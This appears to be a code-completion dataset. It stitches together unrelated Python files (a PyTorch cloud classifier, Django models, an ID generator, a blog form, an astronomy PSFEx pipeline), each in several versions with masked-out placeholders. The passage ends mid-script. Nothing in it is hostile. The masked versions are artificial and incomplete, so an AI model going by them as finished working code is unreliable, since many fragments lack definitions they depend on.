optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
input_size = 65536
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
images = []
for file in glob.glob('*.jpg'):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6:-4]))
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv('./train_v2.csv')
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
model = Net(input_size, hidden_size, num_classes)
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
# os.chdir("./train-jpg")
# there are 40480 training examples
# we will allocate 39000 for training
# and the remaining 1480 will be for validation
input_size = 65536 # 256^2
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
# train_num = 39000
# test_num = 1480
# %% Load data--for clouds and non-clouds
images = []
for file in glob.glob("*.jpg"):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv("./train_v2.csv") # labels are whether or not image is any sort of cloudy or haze
for i in range(train_num + test_num):
tags = labels.iloc[i]["tags"]
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int("cloudy" not in tags and "haze" not in tags))
# train_labels.append(int("water" not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int("cloudy" not in tags and "haze" not in tags))
# test_labels.append(int("water" not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
# parameters
# weights
# self.h1 = nn.Sigmoid() # input_size, hidden_size
# self.o = nn.Sigmoid() # hidden_size, num_classes
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
# print("doing x: {}".format(x.shape))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
# %%
model = Net(input_size, hidden_size, num_classes) # no device configuration here
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load("model.ckpt"))
# model.eval()
# optimizer = TheOptimizerClass(*args, **kwargs)
# checkpoint = torch.load('./model.ckpt')
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
# label = label.long()
# label = label.reshape(1,1)
# label = label.squeeze()
# Forward pass
outputs = model(image)
outputs = outputs.squeeze(0)
# outputs.reshape(1,)
loss = criterion(outputs, label)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# %%
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print("#############")
print(i,outputs, torch.sum(label))
# _, predicted = torch.max(outputs.data, 1)
# correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))
# %%
torch.save(model.state_dict(), 'model.ckpt')
# %%
| [
1,
4,
5,
6,
7
] |
86 | 914f477518918619e0e42184bd03c2a7ed16bb01 | <mask token>
class Contact(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Person(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __str__(self):
return str(self.nickname) + ' ' + self.last_name + '' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE,
null=True, default=52)
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
GENDER = ('Female', 'Female'), ('Male', 'Male')
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
return str(self.nickname) + ' ' + self.last_name + '' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| from django.db import models
class Location(models.Model):
id_location = models.AutoField(primary_key=True)
city = models.CharField(max_length=100, null=True)
street_name = models.CharField(max_length=100, null=True)
street_number = models.IntegerField(null=True)
zip = models.IntegerField(null=True)
country = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=100, null=True)
latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
def __str__(self):
# print('Name', type(self.name), '\nCountry', type(self.country), '\nCity', self.city)
return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
GENDER = (
('Female', 'Female'),
('Male', 'Male'),
)
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
return str(self.nickname) + ' ' + self.last_name + '' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1")
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2")
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str(
self.description) + " " + str(self.id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
| [
11,
16,
18,
19,
24
] |
87 | cdbf9427d48f0a5c53b6efe0de7dfea65a8afd83 | <mask token>
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| <mask token>
def string_id(length=8):
""" Generate Random ID.
Random ID contains ascii letters and digitis.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
return ''.join(random.choice(string.ascii_letters + string.digits) for
_ in range(length))
<mask token>
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| <mask token>
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
Random ID contains ascii letters and digitis.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
return ''.join(random.choice(string.ascii_letters + string.digits) for
_ in range(length))
req_c = None
pid = None
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| import os
import random
import string
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
Random ID contains ascii letters and digitis.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
return ''.join(random.choice(string.ascii_letters + string.digits) for
_ in range(length))
req_c = None
pid = None
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import os
import random
import string
# Use cryptographic-safe random generator as provided by the OS.
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
Random ID contains ascii letters and digitis.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
return ''.join(random.choice(string.ascii_letters +
string.digits)
for _ in range(length))
# Request ID Counter
####################
req_c = None
pid = None
def request_id():
# Using random is pretty slow. This is way quicker.
# It uses cached proc id. Then only does this append counter.
# per request...
#
# It may not be as unique, but highly unlikely to collide
# with recent requet ids.
global req_c, pid
if req_c is None:
req_c = random.randint(1000*1000, 1000*1000*1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| [
1,
2,
3,
4,
5
] |
88 | c4624425f57211e583b5fbaec3943539ce6fea6f | <mask token>
| <mask token>
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__'
| from django import forms
from .models import BlogPost
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__'
| from django import forms
from . models import BlogPost
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__' | null | [
0,
1,
2,
3
] |
89 | a42f36fca2f65d0c5c9b65055af1814d8b4b3d42 | <mask token>
| <mask token>
BUILTINS_MODULE_NAME = 'builtins'
<mask token>
| #!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2023 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide **standard Python module globals** (i.e., global constants
describing modules and packages bundled with CPython's standard library).
This private submodule is *not* intended for importation by downstream callers.
'''
# ....................{ IMPORTS }....................
# ....................{ NAMES }....................
BUILTINS_MODULE_NAME = 'builtins'
'''
Fully-qualified name of the **builtins module** (i.e., objects defined by the
standard :mod:`builtins` module and thus globally available by default
*without* requiring explicit importation).
'''
| null | null | [
0,
1,
2
] |
90 | c23125018a77508dad6fd2cb86ec6d556fbd1019 | <mask token>
| <mask token>
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
<mask token>
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| <mask token>
start_time = time.time()
<mask token>
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh', 'w')
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| <mask token>
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh', 'w')
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
